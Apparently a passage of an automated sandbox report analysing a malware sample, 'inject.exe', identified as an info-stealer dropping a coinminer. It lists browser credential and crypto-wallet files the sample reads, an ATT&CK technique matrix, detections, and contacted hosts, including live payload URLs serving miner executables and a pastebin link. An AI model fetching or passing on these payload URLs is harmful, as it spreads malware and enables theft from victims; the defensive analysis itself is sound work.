                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\binance\Jump to behavior
                  Source: Yara matchFile source: 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3724, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 0.2.inject.exe.37f5570.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.inject.exe.37f5570.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.2215892910.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2055709662.00000000037F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: inject.exe PID: 2452, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3724, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting
                  Valid Accounts221
                  Windows Management Instrumentation
                  1
                  Scripting
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  1
                  Web Service
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Native API
                  1
                  DLL Side-Loading
                  1
                  Access Token Manipulation
                  11
                  Deobfuscate/Decode Files or Information
                  11
                  Input Capture
                  4
                  File and Directory Discovery
                  Remote Desktop Protocol3
                  Data from Local System
                  34
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Command and Scripting Interpreter
                  1
                  Scheduled Task/Job
                  411
                  Process Injection
                  41
                  Obfuscated Files or Information
                  Security Account Manager137
                  System Information Discovery
                  SMB/Windows Admin Shares11
                  Input Capture
                  11
                  Encrypted Channel
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts1
                  Scheduled Task/Job
                  Login Hook1
                  Scheduled Task/Job
                  1
                  Install Root Certificate
                  NTDS461
                  Security Software Discovery
                  Distributed Component Object ModelInput Capture3
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud Accounts1
                  PowerShell
                  Network Logon ScriptNetwork Logon Script2
                  Software Packing
                  LSA Secrets1
                  Process Discovery
                  SSHKeylogging124
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading
                  Cached Domain Credentials241
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Masquerading
                  DCSync1
                  Application Window Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job241
                  Virtualization/Sandbox Evasion
                  Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Access Token Manipulation
                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron411
                  Process Injection
                  Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1522107 Sample: inject.exe Startdate: 29/09/2024 Architecture: WINDOWS Score: 100 75 pastebin.com 2->75 77 api.ip.sb 2->77 79 joxi.net 2->79 97 Suricata IDS alerts for network traffic 2->97 99 Found malware configuration 2->99 101 Malicious sample detected (through community Yara rule) 2->101 105 15 other signatures 2->105 14 inject.exe 2 2->14         started        signatures3 103 Connects to a pastebin service (likely for C&C) 75->103 process4 file5 73 C:\Users\user\AppData\...\inject.exe.log, CSV 14->73 dropped 129 Contains functionality to inject code into remote processes 14->129 131 Writes to foreign memory regions 14->131 133 Allocates memory in foreign processes 14->133 135 Injects a PE file into a foreign processes 14->135 18 RegAsm.exe 21 25 14->18         started        23 conhost.exe 14->23         started        signatures6 process7 dnsIp8 81 185.215.113.22, 49704, 80 WHOLESALECONNECTIONSNL Portugal 18->81 83 147.45.47.81, 49706, 80 FREE-NET-ASFREEnetEU Russian Federation 18->83 65 C:\Users\user\AppData\Local\...\conhost.exe, PE32 18->65 dropped 107 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 18->107 109 Installs new ROOT certificates 18->109 111 Found many strings related to Crypto-Wallets (likely being stolen) 18->111 113 3 other signatures 18->113 25 conhost.exe 8 18->25         started        file9 signatures10 process11 file12 69 C:\Users\user\AppData\Local\Temp\...\7z.exe, PE32+ 25->69 dropped 71 C:\Users\user\AppData\Local\Temp\...\7z.dll, PE32+ 25->71 dropped 119 Antivirus detection for dropped file 25->119 121 Multi AV Scanner detection for dropped file 25->121 123 Contains functionality to register a low level keyboard hook 25->123 29 cmd.exe 2 25->29         started        signatures13 process14 process15 31 Installer.exe 29->31         started        35 7z.exe 29->35         started        38 7z.exe 3 29->38         started        40 13 other processes 29->40 dnsIp16 87 joxi.net 188.114.97.3, 49715, 80 CLOUDFLARENETUS European Union 31->87 89 Writes to foreign memory regions 31->89 91 Allocates memory in foreign processes 31->91 93 Injects a PE file into a foreign processes 31->93 95 Contains functionality to detect sleep reduction / modifications 31->95 42 RegSvcs.exe 31->42         started        67 C:\Users\user\AppData\Local\...\Installer.exe, PE32 35->67 dropped file17 signatures18 process19 dnsIp20 85 pastebin.com 104.20.3.235, 443, 49716 CLOUDFLARENETUS United States 42->85 45 cmd.exe 42->45         started        48 cmd.exe 42->48         started        50 cmd.exe 42->50         started        process21 signatures22 125 Encrypted powershell cmdline option found 45->125 127 Uses schtasks.exe or at.exe to add and modify task schedules 45->127 52 powershell.exe 45->52         started        55 conhost.exe 45->55         started        57 conhost.exe 48->57         started        59 schtasks.exe 48->59         started        61 conhost.exe 50->61         started        process23 signatures24 115 Found many strings related to Crypto-Wallets (likely being stolen) 52->115 117 Loading BitLocker PowerShell Module 52->117 63 WmiPrvSE.exe 52->63         started        process25

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  inject.exe76%ReversingLabsWin32.Trojan.Jalapeno
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\main\extracted\Installer.exe100%AviraTR/Dldr.Agent.vfpsy
                  C:\Users\user\AppData\Local\Temp\conhost.exe100%AviraTR/Redcap.bgduw
                  C:\Users\user\AppData\Local\Temp\main\extracted\Installer.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\conhost.exe83%ReversingLabsWin32.Coinminer.XMRig
                  C:\Users\user\AppData\Local\Temp\main\7z.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\main\7z.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\main\extracted\Installer.exe92%ReversingLabsWin32.Trojan.LummaStealer
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                  https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                  https://nuget.org/nuget.exe0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#0%URL Reputationsafe
                  https://api.ip.sb/ip0%URL Reputationsafe
                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                  https://contoso.com/Icon0%URL Reputationsafe
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                  https://www.ecosia.org/newtab/0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2004/08/addressing0%URL Reputationsafe
                  http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z0%URL Reputationsafe
                  http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                  http://ocsp.sectigo.com00%URL Reputationsafe
                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%URL Reputationsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  joxi.net
                  188.114.97.3
                  truefalse
                    unknown
                    pastebin.com
                    104.20.3.235
                    truetrue
                      unknown
                      api.ip.sb
                      unknown
                      unknowntrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        https://pastebin.com/raw/dq3hWX27false
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                            unknown
                            http://joxi.net/SettingsnsLMEM8Installer.exe, 00000016.00000002.2283720664.0000000000E30000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              http://schemas.xmlsoap.org/ws/2005/02/sc/sctRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                unknown
                                https://www.cloudflare.com/learning/access-management/phishing-attack/RegSvcs.exe, 00000017.00000002.2339213093.0000000003427000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  https://duckduckgo.com/chrome_newtabRegAsm.exe, 00000003.00000002.2228687416.000000000403B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                    unknown
                                    https://duckduckgo.com/ac/?q=RegAsm.exe, 00000003.00000002.2228687416.000000000403B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://tempuri.org/Entity/Id23ResponseDRegAsm.exe, 00000003.00000002.2216914083.00000000031BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      http://tempuri.org/Entity/Id12ResponseRegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        http://tempuri.org/RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          http://tempuri.org/Entity/Id2ResponseRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                                            unknown
                                            http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                              unknown
                                              http://tempuri.org/Entity/Id21ResponseRegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                unknown
                                                http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://147.45.47.81RegAsm.exe, 00000003.00000002.2216914083.00000000031BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceRegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://nuget.org/nuget.exepowershell.exe, 0000001A.00000002.2313653824.0000000005F87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/faultRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                unknown
                                                                http://schemas.xmlsoap.org/ws/2004/10/wsatRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  http://tempuri.org/Entity/Id15ResponseRegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.2339213093.00000000033F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2304314220.0000000004F21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#RegAsm.exe, 00000003.00000002.2216914083.0000000003226000.00000004.00000800.00020000.00000000.sdmp, conhost.exe.3.drfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://api.ip.sb/ipinject.exe, 00000000.00000002.2055709662.00000000037F5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2215892910.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001A.00000002.2304314220.0000000005075000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001A.00000002.2304314220.0000000005075000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              http://tempuri.org/Entity/Id1ResponseDRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://contoso.com/Iconpowershell.exe, 0000001A.00000002.2313653824.0000000005F87000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegAsm.exe, 00000003.00000002.2228687416.000000000403B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  http://joxi.net/4Ak49WQH0GE3Nr.mp3rInstaller.exe, 00000016.00000002.2283720664.0000000000E02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      http://tempuri.org/Entity/Id24ResponseRegAsm.exe, 00000003.00000002.2216914083.00000000030A8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2216914083.00000000031BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://www.ecosia.org/newtab/RegAsm.exe, 00000003.00000002.2228687416.000000000403B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://github.com/Pester/Pesterpowershell.exe, 0000001A.00000002.2304314220.0000000005075000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedRegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://www.cloudflare.com/5xx-error-landingRegSvcs.exe, 00000017.00000002.2339213093.0000000003427000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.2339213093.0000000003423000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                http://schemas.xmlsoap.org/ws/2004/08/addressingRegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zconhost.exe.3.drfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000001A.00000002.2304314220.0000000005075000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    http://pastebin.comRegSvcs.exe, 00000017.00000002.2339213093.0000000003407000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      http://tempuri.org/Entity/Id5ResponseRegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsRegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          http://tempuri.org/Entity/Id10ResponseRegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RenewRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              http://tempuri.org/Entity/Id8ResponseRegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                http://147.45.47.81/WatchDog.exeAhttp://147.45.47.81/lolMiner.exe;http://147.45.47.81/xmrig.exeInstaller.exe, 00000016.00000002.2282337473.000000000031C000.00000004.00000001.01000000.0000000D.sdmp, Installer.exe, 00000016.00000003.2281553518.0000000003542000.00000040.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.2334616398.0000000000402000.00000020.00000400.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  http://ocsp.sectigo.com0RegAsm.exe, 00000003.00000002.2216914083.0000000003226000.00000004.00000800.00020000.00000000.sdmp, Installer.exe.20.dr, conhost.exe.3.drfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      http://schemas.xmlsoap.org/ws/2006/02/addressingidentityRegAsm.exe, 00000003.00000002.2216914083.00000000030A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeyRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/RollbackRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            http://tempuri.org/Entity/Id3ResponseDRegAsm.exe, 00000003.00000002.2216914083.00000000031BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                http://tempuri.org/DRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/06/addressingexRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/security/trust/NonceRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponseRegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        http://147.45.47.81/WinRing0x64.sysRegSvcs.exe, 00000017.00000002.2339213093.0000000003321000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510RegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            http://tempuri.org/Entity/Id13ResponseRegAsm.exe, 00000003.00000002.2216914083.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentifRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/10/wsat/CommittedRegAsm.exe, 00000003.00000002.2216914083.00000000030AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
